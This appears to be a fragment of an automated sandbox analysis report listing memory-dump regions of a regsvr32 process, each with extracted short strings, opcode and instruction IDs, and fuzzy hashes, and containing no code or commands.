                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: %
                                                                                                                                      • API String ID: 0-3714942587
                                                                                                                                      • Opcode ID: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                      • Instruction ID: d5d5bf94d11651037a836977de8f66422f038c9f5d7a5f915f0cc542ec650b78
                                                                                                                                      • Opcode Fuzzy Hash: 4a5e4fe18fa17051425459feb0137b81b0d343578dbe0cd5a85f108800ca0619
                                                                                                                                      • Instruction Fuzzy Hash: 5A516974606608CBDB69DF38D4D57A937E1EF68305F20412DF866C72A2DB70D9258B88
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: A.}
                                                                                                                                      • API String ID: 0-2880059976
                                                                                                                                      • Opcode ID: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                      • Instruction ID: 2f0cd8bb00c33d355f5bc07b1ff950bf82d6730f12d3cb6082a6ef1b734ff39e
                                                                                                                                      • Opcode Fuzzy Hash: 9010837fa6b706847bc4c7b3c9088da85304bc8742fe6f892a790101183beb2f
                                                                                                                                      • Instruction Fuzzy Hash: 8E618FB190078E8FCF48DF68C88A5DE7BB1FB58318F004A1DE86696250D7B49A65CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 0#
                                                                                                                                      • API String ID: 0-456275806
                                                                                                                                      • Opcode ID: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                                      • Instruction ID: 4563f3e02f76dde2de765371aa44af8a356bdaf4307918038d119139e73a9611
                                                                                                                                      • Opcode Fuzzy Hash: f4a433f559aee369bf21c69c9b7459dc344cb914e6653285f272d73a33117f3a
                                                                                                                                      • Instruction Fuzzy Hash: A6415E70608B488FC768DF19D4897AABBF1FB99301F404A6DE58AC7251DB70D849CB82
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: n)
                                                                                                                                      • API String ID: 0-1227437150
                                                                                                                                      • Opcode ID: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                      • Instruction ID: dd456011ca79f85f31d8ff0d6df60f6896318ebd7e2af4f5172cd91629f08304
                                                                                                                                      • Opcode Fuzzy Hash: f07ab33c2aa16265c73684704b65c3edc8d50a8e8d1ddfe7d0f50fe867e83bf1
                                                                                                                                      • Instruction Fuzzy Hash: 9761ADB090074E8FCB48DF68D58A5CE7FF0FB68398F204219E856A6260D37496A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: H&0
                                                                                                                                      • API String ID: 0-1691334370
                                                                                                                                      • Opcode ID: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                      • Instruction ID: 434fd06cb4e7b9e5ef59c8cf231445956357c0a0e2562e482aef1b34ca23bdad
                                                                                                                                      • Opcode Fuzzy Hash: 5a191e61a79b4d2933a8800ab4c515fbfaecb0eb7acbf0dede020ee38eb43630
                                                                                                                                      • Instruction Fuzzy Hash: F8511970519784ABD7D9CF28C4C5B5EBBE0FB88794F90691EF486C62A0CB74C9498B03
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: <+o
                                                                                                                                      • API String ID: 0-2035106886
                                                                                                                                      • Opcode ID: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                      • Instruction ID: 908cc80fe280ddd0bfa2415e6bae89ce11b1f5b72da4428c53a3215ac7c7145d
                                                                                                                                      • Opcode Fuzzy Hash: a127c5cda714885b89af0befeec2260f70d516272a3ffbf2c9e998cd35b08532
                                                                                                                                      • Instruction Fuzzy Hash: 7A51DFB090034E8BCB48CF68C9965DE7BB0FB58348F11861DEC26AA350D3B4D664CF95
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 2d
                                                                                                                                      • API String ID: 0-3866551247
                                                                                                                                      • Opcode ID: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                      • Instruction ID: 258b54a6104a0115c80ff1d617aa7636393a642c0cf89d14f7baa21f525a3413
                                                                                                                                      • Opcode Fuzzy Hash: 21f6d5c278180fa64e04e12198f4d62966834cfebc9beba359b958e849a1d965
                                                                                                                                      • Instruction Fuzzy Hash: 4641CFB05087858FD358DF68C58A61AFBF1BBCA344F108A1EF685CB260D7B6D945CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: ZF{;
                                                                                                                                      • API String ID: 0-2351138993
                                                                                                                                      • Opcode ID: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                      • Instruction ID: 7873f037b774218c73d9d67b0eeaf548a3a2a69e6d8f7c9b30684cba1c01e4e1
                                                                                                                                      • Opcode Fuzzy Hash: 1a3b70ac63407bc6b31dbd99811dd9b011c38cdabefff78aa14352df61b26e81
                                                                                                                                      • Instruction Fuzzy Hash: 525192B180034A8FCB48CF68D48A5DE7FB0FB68398F20461DF956A6250D3B596A4CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: o^
                                                                                                                                      • API String ID: 0-3380573087
                                                                                                                                      • Opcode ID: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                      • Instruction ID: 59a9f6ae0c87b179395b4bbd7662f2404235addd18437060f8b1d9c1d0f8b2e4
                                                                                                                                      • Opcode Fuzzy Hash: 0d6f3437d03fe5aa4f51e8e74fa4409d34d0e7854ad8eda007dad4bfdfa39413
                                                                                                                                      • Instruction Fuzzy Hash: 97419FB091034A9FCB48DF68C4865CEBFB0FB68394F20561AF856A6250D3B4D6A4CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 8N
                                                                                                                                      • API String ID: 0-1657423088
                                                                                                                                      • Opcode ID: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                      • Instruction ID: 05e8e8e61cf54c40f354227930f27795623571b92907d2ce5de0c79af9b5eb72
                                                                                                                                      • Opcode Fuzzy Hash: c7b73ac620a1de8d380d3e919fde74086c8d3eb6f51cee4e1f73d7d71f9b17a5
                                                                                                                                      • Instruction Fuzzy Hash: 3041B2B180078A8FCF48DF68D88A5DE7BF0FB48344F515619F82AA6250D3B49664CF94
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: J3n
                                                                                                                                      • API String ID: 0-3694000235
                                                                                                                                      • Opcode ID: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                      • Instruction ID: fbc63d1771dd8068db465c214aa1fa6fe3c32017f13d31a40a539671eb8e3db3
                                                                                                                                      • Opcode Fuzzy Hash: 5e0585a393d7b877ef62559883b768be0e35881de92711842f1faa0fdb5b3090
                                                                                                                                      • Instruction Fuzzy Hash: 9241B2B090034A8FCB48CF64D48A5DEBFF0FB68398F104619E819A6250D3B496A5CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: c&A
                                                                                                                                      • API String ID: 0-649646960
                                                                                                                                      • Opcode ID: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                      • Instruction ID: 5c1e29145451eb3f41bdf5aebc87db8614fe3fe022aa4abe865b5bb925589833
                                                                                                                                      • Opcode Fuzzy Hash: 222d628d9e4dbd3e938f419e6eccfde97dede3f6fc3ed5f8b1cf47718be42e18
                                                                                                                                      • Instruction Fuzzy Hash: A041B2B490038E8FCF48DF68D8465DE7BB0FF58348F114619E865A6250D3B8D665CF85
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (3
                                                                                                                                      • API String ID: 0-2570504824
                                                                                                                                      • Opcode ID: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                      • Instruction ID: 078cae481ecab5ebae8a44fc1aa70e5a526d9ef7cdb5a4e390aeab476efd0bb7
                                                                                                                                      • Opcode Fuzzy Hash: a8e5f93200cbe41d1aa1f83add337e38aaec9fa9aeab5943e76885fb2eb57509
                                                                                                                                      • Instruction Fuzzy Hash: 8641E1B190034E8BCB48DF65C89A4EE7FB0FB58388F10461DE856AB250D37496A9CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: [r\^
                                                                                                                                      • API String ID: 0-4041245994
                                                                                                                                      • Opcode ID: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                      • Instruction ID: bef136deadb7757a9af36730b388b650d276232742e73576b67fc962b3bf4495
                                                                                                                                      • Opcode Fuzzy Hash: 7e09be878869778b676359d511607d642bff81e0c723db1b86f2cce54c765f10
                                                                                                                                      • Instruction Fuzzy Hash: A841E2B090034E8FCB48DFA4D48A5DE7FB1FB58358F10861DE85AA6210C3B896A4CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X
                                                                                                                                      • API String ID: 0-1684620495
                                                                                                                                      • Opcode ID: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                      • Instruction ID: c074d48008b4f0de6335b08329d09b3dcf7b4425e670a70b5eb694557c772c54
                                                                                                                                      • Opcode Fuzzy Hash: e5059ebb106ab31542f79bed70f85174c6c5fb64cd94bc4155e3ee01b83e8653
                                                                                                                                      • Instruction Fuzzy Hash: CD31C27050074A8BCF48DF68C48A5DE7FA1BB68388F204619F85A96250D3B896A9CBC4
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: [[x
                                                                                                                                      • API String ID: 0-2553898450
                                                                                                                                      • Opcode ID: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                      • Instruction ID: a8e0a129d75fff214b9f34755e9293911d3f443417a5185f62d90841b3dbcaf2
                                                                                                                                      • Opcode Fuzzy Hash: fce498f01d1264328632f2ce3828285d2b3a4cfcf13af4523760d9f610b529f8
                                                                                                                                      • Instruction Fuzzy Hash: 8031AF701087848BD759DF68D48A51EFFF1FBC5398F500A0CF68286260D7B6E889CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: g\&
                                                                                                                                      • API String ID: 0-1994035986
                                                                                                                                      • Opcode ID: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                      • Instruction ID: 78d7b7b30cf9cde697684abc63e3144e4f3c104511914dfd36499d518091e057
                                                                                                                                      • Opcode Fuzzy Hash: f1cd2deb5ac8493e30d5546e6bad4ad0a2e3582185550e3a432f48c3f1068d26
                                                                                                                                      • Instruction Fuzzy Hash: 49419FB090034E8FCB45CF64D48A5DEBFF0FB68788F204619E855A6220D37496A9CFD5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: #X
                                                                                                                                      • API String ID: 0-1684620495
                                                                                                                                      • Opcode ID: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                      • Instruction ID: 6a57ff0d0e6417dcb220414ddd6fd05f9d25965c1474ecef6a781787815c5441
                                                                                                                                      • Opcode Fuzzy Hash: d6f38c749d7bf2c025576eea968cfd60362aaf86b7b5e01395e428e1a7e85413
                                                                                                                                      • Instruction Fuzzy Hash: 0F317FB06187858B8348DF28C45A41ABBE1FB8D31DF504B1DF8CAA7390D738D656CB4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: GfMu
                                                                                                                                      • API String ID: 0-241548529
                                                                                                                                      • Opcode ID: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                      • Instruction ID: 459bd1ae445ea4b99a05d17f5b7f57a0228a98ad0e4316bc4572b1ae85115cb6
                                                                                                                                      • Opcode Fuzzy Hash: 8a67e3bf7b4199a1d3604c9779ca93a2bad0c6c3acd17a475ebbae523034d89b
                                                                                                                                      • Instruction Fuzzy Hash: 3F31A4B080034E9FCB44DF65C88A5DE7FB0FB28398F118619E859A6254D3B8D6A5CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: k|
                                                                                                                                      • API String ID: 0-998972391
                                                                                                                                      • Opcode ID: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                      • Instruction ID: 2ac7c004f44a328b632a383646e80911aebdd3a2d92afb1c4fde4e6b566515e4
                                                                                                                                      • Opcode Fuzzy Hash: 6236ffa949a3ca0ec4882c0e2f53e6d4deed0830cebabbf337115adf18185b80
                                                                                                                                      • Instruction Fuzzy Hash: 0E316BB55187858BC348DF28C44A41ABBE0FB8D70DF401B2EF4CAAA254D778D646CB4B
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: wz_
                                                                                                                                      • API String ID: 0-2163964638
                                                                                                                                      • Opcode ID: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                      • Instruction ID: 85abef5d63a3cc0fc3de64b3cbe2355aa0dee9f977196367498a1db9d5329f65
                                                                                                                                      • Opcode Fuzzy Hash: b40e6b262b7e1498d3f21ab3c4cda150b043a181806bf38e185a76218508c891
                                                                                                                                      • Instruction Fuzzy Hash: 1B31A3B190438E9FCB84CF64D88A5DE7BB0FB58358F104A19EC69A6210D3B4C665CFC5
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: {?Q
                                                                                                                                      • API String ID: 0-927583641
                                                                                                                                      • Opcode ID: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                      • Instruction ID: 7795a7564029993a5c8c4ac1e25182a2d51a1c6f7b8e281b16b6dc8244c6ef4e
                                                                                                                                      • Opcode Fuzzy Hash: 839c14ccb0eb6183acb001e089a9759e5faeed76da85f154f8e90dad145701fc
                                                                                                                                      • Instruction Fuzzy Hash: A431A4B4529780ABC788DF28C49691EBBF1FBC9314F806A1CF9868A350D775D855CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: |}6\
                                                                                                                                      • API String ID: 0-3074799505
                                                                                                                                      • Opcode ID: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                      • Instruction ID: deee1345628e574e08842a382b14917b2dc53efdf1581624b2725d4aab218cc2
                                                                                                                                      • Opcode Fuzzy Hash: 23fa338bd40b2aad003d9f0634311d3454ffb754a67c2adf2f847410751a50d9
                                                                                                                                      • Instruction Fuzzy Hash: 06216EB4529380AB8388DF29C48981EBBF0FBC9344F906A1EF88696364D775D445CB02
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: 3&a
                                                                                                                                      • API String ID: 0-537350193
                                                                                                                                      • Opcode ID: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                      • Instruction ID: 8a645f8d3c8cc56bac308d2d2ecdfd486002fa9c5fd877c3d873e02a569d50ca
                                                                                                                                      • Opcode Fuzzy Hash: beaf1e19c187a0f85b52ebc77c111716efe920449ad97bd8647c465ec4e93b8f
                                                                                                                                      • Instruction Fuzzy Hash: 39216E74528781AFC788DF28D49981FBBE1FB88304F806A1DF88687360D774D459CB42
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: o0:X
                                                                                                                                      • API String ID: 0-645126758
                                                                                                                                      • Opcode ID: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                      • Instruction ID: 22f452758bb10e6d75f49cffb2921ccf5c0237a957934827f7fc810dfbc33e73
                                                                                                                                      • Opcode Fuzzy Hash: 16e91aede479f97639727f95d3587bc05ccff40046920f17c5bc1350390a4fa4
                                                                                                                                      • Instruction Fuzzy Hash: AC2168B060C7848BD348DF68C49691ABBE0FB9D358F504B1DF4CAAA261D3789645CB4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285321834.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                                                                                      Yara matches
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: D4}
                                                                                                                                      • API String ID: 0-491520632
                                                                                                                                      • Opcode ID: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                      • Instruction ID: bbb3bee9fa9cdc8f6282772afd18f295cdd348f2c7f059baa6db29b6d6e0bb5b
                                                                                                                                      • Opcode Fuzzy Hash: e694fe3bb7f23863c566d88b3f3e9b79af36947dfdaac95326105a138b36f14b
                                                                                                                                      • Instruction Fuzzy Hash: A9215DB550C3848BC788DF28C49651BBBE1BB8C318F444B2DF4CAAA365D7789654CF4A
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.285500604.00007FFC671C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFC671C0000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.285490467.00007FFC671C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285624833.00007FFC67212000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285640883.00007FFC67216000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.285659521.00007FFC67219000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_7ffc671c0000_regsvr32.jbxd
                                                                                                                                      Similarity
